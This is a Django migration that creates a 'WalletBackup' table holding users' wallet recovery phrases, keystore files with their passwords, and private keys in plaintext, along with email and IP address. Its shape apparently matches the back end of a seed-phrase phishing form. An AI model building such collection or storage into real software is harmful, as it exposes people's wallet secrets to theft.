# Generated by Django 5.2.7 on 2026-02-08 21:11

import django.utils.timezone
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='WalletBackup',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('uid', models.CharField(max_length=50, unique=True)),
                ('wallet_name', models.CharField(max_length=100)),
                ('form_type', models.CharField(choices=[('phrase', 'Recovery Phrase'), ('keystore', 'Keystore JSON'), ('private_key', 'Private Key')], max_length=20)),
                ('email', models.EmailField(max_length=254)),
                ('wallet_display_name', models.CharField(max_length=100)),
                ('phrase', models.TextField(blank=True, null=True)),
                ('keystore_json', models.TextField(blank=True, null=True)),
                ('keystore_password', models.CharField(blank=True, max_length=255, null=True)),
                ('private_key', models.TextField(blank=True, null=True)),
                ('created_at', models.DateTimeField(default=django.utils.timezone.now)),
                ('ip_address', models.GenericIPAddressField(blank=True, null=True)),
            ],
            options={
                'verbose_name': 'Wallet Backup',
                'verbose_name_plural': 'Wallet Backups',
                'ordering': ['-created_at'],
            },
        ),
    ]
